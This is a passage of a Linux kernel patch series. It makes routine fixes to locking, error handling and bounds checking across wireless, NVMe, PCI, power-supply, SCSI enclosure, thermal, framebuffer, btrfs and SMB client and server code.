+ 	mvmsta->tfd_queue_msk &= ~BIT(queue); /* Don't use this queue anymore */
+@@ -693,7 +699,7 @@ static int iwl_mvm_redirect_queue(struct iwl_mvm *mvm, int queue, int tid,
+ 			    queue, iwl_mvm_ac_to_tx_fifo[ac]);
+ 
+ 	/* Stop the queue and wait for it to empty */
+-	txq->stopped = true;
++	set_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT, &txq->state);
+ 
+ 	ret = iwl_trans_wait_tx_queues_empty(mvm->trans, BIT(queue));
+ 	if (ret) {
+@@ -736,7 +742,7 @@ static int iwl_mvm_redirect_queue(struct iwl_mvm *mvm, int queue, int tid,
+ 
+ out:
+ 	/* Continue using the queue */
+-	txq->stopped = false;
++	clear_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT, &txq->state);
+ 
+ 	return ret;
+ }
+@@ -1444,12 +1450,22 @@ void iwl_mvm_add_new_dqa_stream_wk(struct work_struct *wk)
+ 		 * a queue in the function itself.
+ 		 */
+ 		if (iwl_mvm_sta_alloc_queue(mvm, txq->sta, txq->ac, tid)) {
++			spin_lock_bh(&mvm->add_stream_lock);
+ 			list_del_init(&mvmtxq->list);
++			spin_unlock_bh(&mvm->add_stream_lock);
+ 			continue;
+ 		}
+ 
+-		list_del_init(&mvmtxq->list);
++		/* now we're ready, any remaining races/concurrency will be
++		 * handled in iwl_mvm_mac_itxq_xmit()
++		 */
++		set_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++
+ 		local_bh_disable();
++		spin_lock(&mvm->add_stream_lock);
++		list_del_init(&mvmtxq->list);
++		spin_unlock(&mvm->add_stream_lock);
++
+ 		iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
+ 		local_bh_enable();
+ 	}
+@@ -1864,8 +1880,11 @@ static void iwl_mvm_disable_sta_queues(struct iwl_mvm *mvm,
+ 		struct iwl_mvm_txq *mvmtxq =
+ 			iwl_mvm_txq_from_mac80211(sta->txq[i]);
+ 
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/marvell/mwifiex/pcie.c b/drivers/net/wireless/marvell/mwifiex/pcie.c
+index 5dcf61761a165..9a698a16a8f38 100644
+--- a/drivers/net/wireless/marvell/mwifiex/pcie.c
++++ b/drivers/net/wireless/marvell/mwifiex/pcie.c
+@@ -172,7 +172,7 @@ static const struct mwifiex_pcie_device mwifiex_pcie8997 = {
+ 	.can_ext_scan = true,
+ };
+ 
+-static const struct of_device_id mwifiex_pcie_of_match_table[] = {
++static const struct of_device_id mwifiex_pcie_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "pci11ab,2b42" },
+ 	{ .compatible = "pci1b4b,2b42" },
+ 	{ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index 9f506efa53705..ea1c1c2412e72 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -479,7 +479,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ 	{"EXTLAST", NULL, 0, 0xFE},
+ };
+ 
+-static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++static const struct of_device_id mwifiex_sdio_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_pcie.c b/drivers/net/wwan/iosm/iosm_ipc_pcie.c
+index 5bf5a93937c9c..04517bd3325a2 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_pcie.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_pcie.c
+@@ -295,7 +295,7 @@ static int ipc_pcie_probe(struct pci_dev *pci,
+ 	ret = dma_set_mask(ipc_pcie->dev, DMA_BIT_MASK(64));
+ 	if (ret) {
+ 		dev_err(ipc_pcie->dev, "Could not set PCI DMA mask: %d", ret);
+-		return ret;
++		goto set_mask_fail;
+ 	}
+ 
+ 	ipc_pcie_config_aspm(ipc_pcie);
+@@ -323,6 +323,7 @@ static int ipc_pcie_probe(struct pci_dev *pci,
+ imem_init_fail:
+ 	ipc_pcie_resources_release(ipc_pcie);
+ resources_req_fail:
++set_mask_fail:
+ 	pci_disable_device(pci);
+ pci_enable_fail:
+ 	kfree(ipc_pcie);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index ee1b075d12cfc..c0429f9f50920 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3106,7 +3106,8 @@ static int nvme_init_non_mdts_limits(struct nvme_ctrl *ctrl)
+ 	else
+ 		ctrl->max_zeroes_sectors = 0;
+ 
+-	if (nvme_ctrl_limited_cns(ctrl))
++	if (ctrl->subsys->subtype != NVME_NQN_NVME ||
++	    nvme_ctrl_limited_cns(ctrl))
+ 		return 0;
+ 
+ 	id = kzalloc(sizeof(*id), GFP_KERNEL);
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index ea3f0806783a3..989f31471da69 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3494,6 +3494,9 @@ static const struct pci_device_id nvme_id_table[] = {
+ 	{ PCI_DEVICE(0x1d97, 0x1d97), /* Lexar NM620 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2269), /* Lexar NM760 */
++		.driver_data = NVME_QUIRK_BOGUS_NID |
++				NVME_QUIRK_IGNORE_DEV_SUBNQN, },
++	{ PCI_DEVICE(0x10ec, 0x5763), /* TEAMGROUP T-FORCE CARDEA ZERO Z330 SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
+ 		.driver_data = NVME_QUIRK_DMA_ADDRESS_BITS_48, },
+diff --git a/drivers/pci/remove.c b/drivers/pci/remove.c
+index 0145aef1b9301..22d39e12b236a 100644
+--- a/drivers/pci/remove.c
++++ b/drivers/pci/remove.c
+@@ -157,8 +157,6 @@ void pci_remove_root_bus(struct pci_bus *bus)
+ 	list_for_each_entry_safe(child, tmp,
+ 				 &bus->devices, bus_list)
+ 		pci_remove_bus_device(child);
+-	pci_remove_bus(bus);
+-	host_bridge->bus = NULL;
+ 
+ #ifdef CONFIG_PCI_DOMAINS_GENERIC
+ 	/* Release domain_nr if it was dynamically allocated */
+@@ -166,6 +164,9 @@ void pci_remove_root_bus(struct pci_bus *bus)
+ 		pci_bus_release_domain_nr(bus, host_bridge->dev.parent);
+ #endif
+ 
++	pci_remove_bus(bus);
++	host_bridge->bus = NULL;
++
+ 	/* remove the host bridge */
+ 	device_del(&host_bridge->dev);
+ }
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 5e7b82a2b13d0..32c3edaf90385 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -865,34 +865,32 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init_pin(struct amd_gpio *gpio_dev, int pin)
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+ {
+-	const struct pin_desc *pd;
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+ 	unsigned long flags;
+ 	u32 pin_reg, mask;
++	int i;
+ 
+ 	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+ 		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+ 		BIT(WAKE_CNTRL_OFF_S4);
+ 
+-	pd = pin_desc_get(gpio_dev->pctrl, pin);
+-	if (!pd)
+-		return;
++	for (i = 0; i < desc->npins; i++) {
++		int pin = desc->pins[i].number;
++		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+ 
+-	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+-	pin_reg = readl(gpio_dev->base + pin * 4);
+-	pin_reg &= ~mask;
+-	writel(pin_reg, gpio_dev->base + pin * 4);
+-	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-}
++		if (!pd)
++			continue;
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+-{
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+-	int i;
++		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 
+-	for (i = 0; i < desc->npins; i++)
+-		amd_gpio_irq_init_pin(gpio_dev, i);
++		pin_reg = readl(gpio_dev->base + i * 4);
++		pin_reg &= ~mask;
++		writel(pin_reg, gpio_dev->base + i * 4);
++
++		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++	}
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -945,10 +943,8 @@ static int amd_gpio_resume(struct device *dev)
+ 	for (i = 0; i < desc->npins; i++) {
+ 		int pin = desc->pins[i].number;
+ 
+-		if (!amd_gpio_should_save(gpio_dev, pin)) {
+-			amd_gpio_irq_init_pin(gpio_dev, pin);
++		if (!amd_gpio_should_save(gpio_dev, pin))
+ 			continue;
+-		}
+ 
+ 		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 		gpio_dev->saved_regs[i] |= readl(gpio_dev->base + pin * 4) & PIN_IRQ_PENDING;
+diff --git a/drivers/power/supply/axp288_fuel_gauge.c b/drivers/power/supply/axp288_fuel_gauge.c
+index 8e6f8a6550790..05f4131784629 100644
+--- a/drivers/power/supply/axp288_fuel_gauge.c
++++ b/drivers/power/supply/axp288_fuel_gauge.c
+@@ -724,6 +724,8 @@ static int axp288_fuel_gauge_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < AXP288_FG_INTR_NUM; i++) {
+ 		pirq = platform_get_irq(pdev, i);
++		if (pirq < 0)
++			continue;
+ 		ret = regmap_irq_get_virq(axp20x->regmap_irqc, pirq);
+ 		if (ret < 0)
+ 			return dev_err_probe(dev, ret, "getting vIRQ %d\n", pirq);
+diff --git a/drivers/power/supply/cros_usbpd-charger.c b/drivers/power/supply/cros_usbpd-charger.c
+index cadb6a0c2cc7e..b6c96376776a9 100644
+--- a/drivers/power/supply/cros_usbpd-charger.c
++++ b/drivers/power/supply/cros_usbpd-charger.c
+@@ -276,7 +276,7 @@ static int cros_usbpd_charger_get_power_info(struct port_data *port)
+ 		port->psy_current_max = 0;
+ 		break;
+ 	default:
+-		dev_err(dev, "Port %d: default case!\n", port->port_number);
++		dev_dbg(dev, "Port %d: default case!\n", port->port_number);
+ 		port->psy_usb_type = POWER_SUPPLY_USB_TYPE_SDP;
+ 	}
+ 
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index 4f9c1c4179165..36f807b5ec442 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -785,8 +785,6 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 				 bulk_reg, 4);
+ 		tmp = get_unaligned_be32(bulk_reg);
+-		if (tmp < 0)
+-			tmp = 0;
+ 		boot_charge_mah = ADC_TO_CHARGE_UAH(tmp,
+ 						    charger->res_div) / 1000;
+ 		/*
+@@ -825,8 +823,6 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 	regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 			 bulk_reg, 4);
+ 	tmp = get_unaligned_be32(bulk_reg);
+-	if (tmp < 0)
+-		tmp = 0;
+ 	boot_charge_mah = ADC_TO_CHARGE_UAH(tmp, charger->res_div) / 1000;
+ 	regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_OCV_VOL_H,
+ 			 bulk_reg, 2);
+diff --git a/drivers/scsi/ses.c b/drivers/scsi/ses.c
+index 1707d6d144d21..6a1428d453f3e 100644
+--- a/drivers/scsi/ses.c
++++ b/drivers/scsi/ses.c
+@@ -503,9 +503,6 @@ static int ses_enclosure_find_by_addr(struct enclosure_device *edev,
+ 	int i;
+ 	struct ses_component *scomp;
+ 
+-	if (!edev->component[0].scratch)
+-		return 0;
+-
+ 	for (i = 0; i < edev->components; i++) {
+ 		scomp = edev->component[i].scratch;
+ 		if (scomp->addr != efd->addr)
+@@ -596,8 +593,10 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 						components++,
+ 						type_ptr[0],
+ 						name);
+-				else
++				else if (components < edev->components)
+ 					ecomp = &edev->component[components++];
++				else
++					ecomp = ERR_PTR(-EINVAL);
+ 
+ 				if (!IS_ERR(ecomp)) {
+ 					if (addl_desc_ptr) {
+@@ -728,11 +727,6 @@ static int ses_intf_add(struct device *cdev,
+ 			components += type_ptr[1];
+ 	}
+ 
+-	if (components == 0) {
+-		sdev_printk(KERN_WARNING, sdev, "enclosure has no enumerated components\n");
+-		goto err_free;
+-	}
+-
+ 	ses_dev->page1 = buf;
+ 	ses_dev->page1_len = len;
+ 	buf = NULL;
+@@ -774,9 +768,11 @@ static int ses_intf_add(struct device *cdev,
+ 		buf = NULL;
+ 	}
+ page2_not_supported:
+-	scomp = kcalloc(components, sizeof(struct ses_component), GFP_KERNEL);
+-	if (!scomp)
+-		goto err_free;
++	if (components > 0) {
++		scomp = kcalloc(components, sizeof(struct ses_component), GFP_KERNEL);
++		if (!scomp)
++			goto err_free;
++	}
+ 
+ 	edev = enclosure_register(cdev->parent, dev_name(&sdev->sdev_gendev),
+ 				  components, &ses_enclosure_callbacks);
+diff --git a/drivers/thermal/intel/therm_throt.c b/drivers/thermal/intel/therm_throt.c
+index 2e22bb82b7389..e69868e868eb9 100644
+--- a/drivers/thermal/intel/therm_throt.c
++++ b/drivers/thermal/intel/therm_throt.c
+@@ -193,8 +193,67 @@ static const struct attribute_group thermal_attr_group = {
+ #define THERM_THROT_POLL_INTERVAL	HZ
+ #define THERM_STATUS_PROCHOT_LOG	BIT(1)
+ 
+-#define THERM_STATUS_CLEAR_CORE_MASK (BIT(1) | BIT(3) | BIT(5) | BIT(7) | BIT(9) | BIT(11) | BIT(13) | BIT(15))
+-#define THERM_STATUS_CLEAR_PKG_MASK  (BIT(1) | BIT(3) | BIT(5) | BIT(7) | BIT(9) | BIT(11))
++static u64 therm_intr_core_clear_mask;
++static u64 therm_intr_pkg_clear_mask;
++
++static void thermal_intr_init_core_clear_mask(void)
++{
++	if (therm_intr_core_clear_mask)
++		return;
++
++	/*
++	 * Reference: Intel SDM  Volume 4
++	 * "Table 2-2. IA-32 Architectural MSRs", MSR 0x19C
++	 * IA32_THERM_STATUS.
++	 */
++
++	/*
++	 * Bit 1, 3, 5: CPUID.01H:EDX[22] = 1. This driver will not
++	 * enable interrupts, when 0 as it checks for X86_FEATURE_ACPI.
++	 */
++	therm_intr_core_clear_mask = (BIT(1) | BIT(3) | BIT(5));
++
++	/*
++	 * Bit 7 and 9: Thermal Threshold #1 and #2 log
++	 * If CPUID.01H:ECX[8] = 1
++	 */
++	if (boot_cpu_has(X86_FEATURE_TM2))
++		therm_intr_core_clear_mask |= (BIT(7) | BIT(9));
++
++	/* Bit 11: Power Limitation log (R/WC0) If CPUID.06H:EAX[4] = 1 */
++	if (boot_cpu_has(X86_FEATURE_PLN))
++		therm_intr_core_clear_mask |= BIT(11);
++
++	/*
++	 * Bit 13: Current Limit log (R/WC0) If CPUID.06H:EAX[7] = 1
++	 * Bit 15: Cross Domain Limit log (R/WC0) If CPUID.06H:EAX[7] = 1
++	 */
++	if (boot_cpu_has(X86_FEATURE_HWP))
++		therm_intr_core_clear_mask |= (BIT(13) | BIT(15));
++}
++
++static void thermal_intr_init_pkg_clear_mask(void)
++{
++	if (therm_intr_pkg_clear_mask)
++		return;
++
++	/*
++	 * Reference: Intel SDM  Volume 4
++	 * "Table 2-2. IA-32 Architectural MSRs", MSR 0x1B1
++	 * IA32_PACKAGE_THERM_STATUS.
++	 */
++
++	/* All bits except BIT 26 depend on CPUID.06H: EAX[6] = 1 */
++	if (boot_cpu_has(X86_FEATURE_PTS))
++		therm_intr_pkg_clear_mask = (BIT(1) | BIT(3) | BIT(5) | BIT(7) | BIT(9) | BIT(11));
++
++	/*
++	 * Intel SDM Volume 2A: Thermal and Power Management Leaf
++	 * Bit 26: CPUID.06H: EAX[19] = 1
++	 */
++	if (boot_cpu_has(X86_FEATURE_HFI))
++		therm_intr_pkg_clear_mask |= BIT(26);
++}
+ 
+ /*
+  * Clear the bits in package thermal status register for bit = 1
+@@ -207,13 +266,10 @@ void thermal_clear_package_intr_status(int level, u64 bit_mask)
+ 
+ 	if (level == CORE_LEVEL) {
+ 		msr  = MSR_IA32_THERM_STATUS;
+-		msr_val = THERM_STATUS_CLEAR_CORE_MASK;
++		msr_val = therm_intr_core_clear_mask;
+ 	} else {
+ 		msr  = MSR_IA32_PACKAGE_THERM_STATUS;
+-		msr_val = THERM_STATUS_CLEAR_PKG_MASK;
+-		if (boot_cpu_has(X86_FEATURE_HFI))
+-			msr_val |= BIT(26);
+-
++		msr_val = therm_intr_pkg_clear_mask;
+ 	}
+ 
+ 	msr_val &= ~bit_mask;
+@@ -708,6 +764,9 @@ void intel_init_thermal(struct cpuinfo_x86 *c)
+ 	h = THERMAL_APIC_VECTOR | APIC_DM_FIXED | APIC_LVT_MASKED;
+ 	apic_write(APIC_LVTTHMR, h);
+ 
++	thermal_intr_init_core_clear_mask();
++	thermal_intr_init_pkg_clear_mask();
++
+ 	rdmsr(MSR_IA32_THERM_INTERRUPT, l, h);
+ 	if (cpu_has(c, X86_FEATURE_PLN) && !int_pln_enable)
+ 		wrmsr(MSR_IA32_THERM_INTERRUPT,
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 2bc8baa90c0f2..fa205be94a4b8 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -823,7 +823,7 @@ static int set_con2fb_map(int unit, int newidx, int user)
+ 	int oldidx = con2fb_map[unit];
+ 	struct fb_info *info = fbcon_registered_fb[newidx];
+ 	struct fb_info *oldinfo = NULL;
+-	int found, err = 0, show_logo;
++	int err = 0, show_logo;
+ 
+ 	WARN_CONSOLE_UNLOCKED();
+ 
+@@ -841,26 +841,26 @@ static int set_con2fb_map(int unit, int newidx, int user)
+ 	if (oldidx != -1)
+ 		oldinfo = fbcon_registered_fb[oldidx];
+ 
+-	found = search_fb_in_map(newidx);
+-
+-	if (!err && !found) {
++	if (!search_fb_in_map(newidx)) {
+ 		err = con2fb_acquire_newinfo(vc, info, unit);
+-		if (!err)
+-			con2fb_map[unit] = newidx;
++		if (err)
++			return err;
++
++		fbcon_add_cursor_work(info);
+ 	}
+ 
++	con2fb_map[unit] = newidx;
++
+ 	/*
+ 	 * If old fb is not mapped to any of the consoles,
+ 	 * fbcon should release it.
+ 	 */
+-	if (!err && oldinfo && !search_fb_in_map(oldidx))
++	if (oldinfo && !search_fb_in_map(oldidx))
+ 		con2fb_release_oldinfo(vc, oldinfo, info);
+ 
+ 	show_logo = (fg_console == 0 && !user &&
+ 			 logo_shown != FBCON_LOGO_DONTSHOW);
+ 
+-	if (!found)
+-		fbcon_add_cursor_work(info);
+ 	con2fb_map_boot[unit] = newidx;
+ 	con2fb_init_display(vc, info, unit, show_logo);
+ 
+diff --git a/drivers/video/fbdev/core/fbmem.c b/drivers/video/fbdev/core/fbmem.c
+index ab3545a00abc5..aa2cb36af3f1e 100644
+--- a/drivers/video/fbdev/core/fbmem.c
++++ b/drivers/video/fbdev/core/fbmem.c
+@@ -1117,6 +1117,8 @@ static long do_fb_ioctl(struct fb_info *info, unsigned int cmd,
+ 	case FBIOPUT_VSCREENINFO:
+ 		if (copy_from_user(&var, argp, sizeof(var)))
+ 			return -EFAULT;
++		/* only for kernel-internal use */
++		var.activate &= ~FB_ACTIVATE_KD_TEXT;
+ 		console_lock();
+ 		lock_fb_info(info);
+ 		ret = fbcon_modechange_possible(info, &var);
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index fde40112a2593..174d196d69609 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -2433,6 +2433,20 @@ static int btrfs_init_csum_hash(struct btrfs_fs_info *fs_info, u16 csum_type)
+ 
+ 	fs_info->csum_shash = csum_shash;
+ 
++	/*
++	 * Check if the checksum implementation is a fast accelerated one.
++	 * As-is this is a bit of a hack and should be replaced once the csum
++	 * implementations provide that information themselves.
++	 */
++	switch (csum_type) {
++	case BTRFS_CSUM_TYPE_CRC32:
++		if (!strstr(crypto_shash_driver_name(csum_shash), "generic"))
++			set_bit(BTRFS_FS_CSUM_IMPL_FAST, &fs_info->flags);
++		break;
++	default:
++		break;
++	}
++
+ 	btrfs_info(fs_info, "using %s (%s) checksum algorithm",
+ 			btrfs_super_csum_name(csum_type),
+ 			crypto_shash_driver_name(csum_shash));
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 433ce221dc5c7..3f3c8f9186f90 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -1515,8 +1515,6 @@ static struct dentry *btrfs_mount_root(struct file_system_type *fs_type,
+ 		shrinker_debugfs_rename(&s->s_shrink, "sb-%s:%s", fs_type->name,
+ 					s->s_id);
+ 		btrfs_sb(s)->bdev_holder = fs_type;
+-		if (!strstr(crc32c_impl(), "generic"))
+-			set_bit(BTRFS_FS_CSUM_IMPL_FAST, &fs_info->flags);
+ 		error = btrfs_fill_super(s, fs_devices, data);
+ 	}
+ 	if (!error)
+@@ -1630,6 +1628,8 @@ static void btrfs_resize_thread_pool(struct btrfs_fs_info *fs_info,
+ 	btrfs_workqueue_set_max(fs_info->hipri_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->delalloc_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->caching_workers, new_pool_size);
++	workqueue_set_max_active(fs_info->endio_workers, new_pool_size);
++	workqueue_set_max_active(fs_info->endio_meta_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->endio_write_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->endio_freespace_worker, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->delayed_workers, new_pool_size);
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index b37379b62cc77..ab59faf8a06a7 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -588,11 +588,15 @@ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 
+ }
+ 
++/* If invalid preauth context warn but use what we requested, SHA-512 */
+ static void decode_preauth_context(struct smb2_preauth_neg_context *ctxt)
+ {
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+-	/* If invalid preauth context warn but use what we requested, SHA-512 */
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one HashAlgorithms member is accounted for.
++	 */
+ 	if (len < MIN_PREAUTH_CTXT_DATA_LEN) {
+ 		pr_warn_once("server sent bad preauth context\n");
+ 		return;
+@@ -611,7 +615,11 @@ static void decode_compress_ctx(struct TCP_Server_Info *server,
+ {
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+-	/* sizeof compress context is a one element compression capbility struct */
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one CompressionAlgorithms member is accounted
++	 * for.
++	 */
+ 	if (len < 10) {
+ 		pr_warn_once("server sent bad compression cntxt\n");
+ 		return;
+@@ -633,6 +641,11 @@ static int decode_encrypt_ctx(struct TCP_Server_Info *server,
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+ 	cifs_dbg(FYI, "decode SMB3.11 encryption neg context of len %d\n", len);
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one Cipher flexible array member is accounted
++	 * for.
++	 */
+ 	if (len < MIN_ENCRYPT_CTXT_DATA_LEN) {
+ 		pr_warn_once("server sent bad crypto ctxt len\n");
+ 		return -EINVAL;
+@@ -679,6 +692,11 @@ static void decode_signing_ctx(struct TCP_Server_Info *server,
+ {
+ 	unsigned int len = le16_to_cpu(pctxt->DataLength);
+ 
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one SigningAlgorithms flexible array member is
++	 * accounted for.
++	 */
+ 	if ((len < 4) || (len > 16)) {
+ 		pr_warn_once("server sent bad signing negcontext\n");
+ 		return;
+@@ -720,14 +738,19 @@ static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+ 	for (i = 0; i < ctxt_cnt; i++) {
+ 		int clen;
+ 		/* check that offset is not beyond end of SMB */
+-		if (len_of_ctxts == 0)
+-			break;
+-
+ 		if (len_of_ctxts < sizeof(struct smb2_neg_context))
+ 			break;
+ 
+ 		pctx = (struct smb2_neg_context *)(offset + (char *)rsp);
+-		clen = le16_to_cpu(pctx->DataLength);
++		clen = sizeof(struct smb2_neg_context)
++			+ le16_to_cpu(pctx->DataLength);
++		/*
++		 * 2.2.4 SMB2 NEGOTIATE Response
++		 * Subsequent negotiate contexts MUST appear at the first 8-byte
++		 * aligned offset following the previous negotiate context.
++		 */
++		if (i + 1 != ctxt_cnt)
++			clen = ALIGN(clen, 8);
+ 		if (clen > len_of_ctxts)
+ 			break;
+ 
+@@ -748,12 +771,10 @@ static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+ 		else
+ 			cifs_server_dbg(VFS, "unknown negcontext of type %d ignored\n",
+ 				le16_to_cpu(pctx->ContextType));
+-
+ 		if (rc)
+ 			break;
+-		/* offsets must be 8 byte aligned */
+-		clen = ALIGN(clen, 8);
+-		offset += clen + sizeof(struct smb2_neg_context);
++
++		offset += clen;
+ 		len_of_ctxts -= clen;
+ 	}
+ 	return rc;
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 7e0b62f94a079..32a837014cbfc 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -872,17 +872,21 @@ static void assemble_neg_contexts(struct ksmbd_conn *conn,
+ }
+ 
+ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+-				  struct smb2_preauth_neg_context *pneg_ctxt)
++				  struct smb2_preauth_neg_context *pneg_ctxt,
++				  int len_of_ctxts)
+ {
+-	__le32 err = STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
++	/*
++	 * sizeof(smb2_preauth_neg_context) assumes SMB311_SALT_SIZE Salt,
++	 * which may not be present. Only check for used HashAlgorithms[1].
++	 */
++	if (len_of_ctxts < MIN_PREAUTH_CTXT_DATA_LEN)
++		return STATUS_INVALID_PARAMETER;
+ 
+-	if (pneg_ctxt->HashAlgorithms == SMB2_PREAUTH_INTEGRITY_SHA512) {
+-		conn->preauth_info->Preauth_HashId =
+-			SMB2_PREAUTH_INTEGRITY_SHA512;
+-		err = STATUS_SUCCESS;
+-	}
++	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
++		return STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
+ 
+-	return err;
++	conn->preauth_info->Preauth_HashId = SMB2_PREAUTH_INTEGRITY_SHA512;
++	return STATUS_SUCCESS;
+ }
+ 
+ static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+@@ -1010,7 +1014,8 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 				break;
+ 
+ 			status = decode_preauth_ctxt(conn,
+-						     (struct smb2_preauth_neg_context *)pctx);
++						     (struct smb2_preauth_neg_context *)pctx,
++						     len_of_ctxts);
+ 			if (status != STATUS_SUCCESS)
+ 				break;
+ 		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index db6ec828aa4b2..7e8e8633ad905 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1623,6 +1623,8 @@ pci_alloc_irq_vectors(struct pci_dev *dev, unsigned int min_vecs,
+ 					      flags, NULL);
+ }
+ 
++static inline bool pci_msix_can_alloc_dyn(struct pci_dev *dev)
++{ return false; }
+ static inline struct msi_map pci_msix_alloc_irq_at(struct pci_dev *dev, unsigned int index,
+ 						   const struct irq_affinity_desc *affdesc)
+ {
+diff --git a/include/linux/rtnetlink.h b/include/linux/rtnetlink.h
+index 92ad75549e9cd..b6e6378dcbbd7 100644
+--- a/include/linux/rtnetlink.h
++++ b/include/linux/rtnetlink.h
+@@ -25,7 +25,8 @@ void rtmsg_ifinfo_newnet(int type, struct net_device *dev, unsigned int change,
+ struct sk_buff *rtmsg_ifinfo_build_skb(int type, struct net_device *dev,
+ 				       unsigned change, u32 event,
+ 				       gfp_t flags, int *new_nsid,
+-				       int new_ifindex, u32 portid, u32 seq);
++				       int new_ifindex, u32 portid,
++				       const struct nlmsghdr *nlh);
+ void rtmsg_ifinfo_send(struct sk_buff *skb, struct net_device *dev,
